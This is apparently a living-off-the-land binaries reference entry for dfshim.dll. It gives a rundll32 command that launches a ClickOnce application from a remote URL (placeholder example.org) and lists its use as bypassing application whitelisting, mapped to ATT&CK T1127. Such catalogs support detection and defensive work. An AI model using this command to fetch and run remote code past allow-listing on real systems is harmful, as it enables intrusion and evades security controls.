Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
rundll32.exe dfshim.dll,ShOpenVerbApplication https://www.example.org/file.ext
- Use case
- Use binary to bypass Application whitelisting
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CKĀ® technique
- T1127: Trusted Developer Utilities Proxy Execution
- Tags
Execute: ClickOnce
Execute: Remote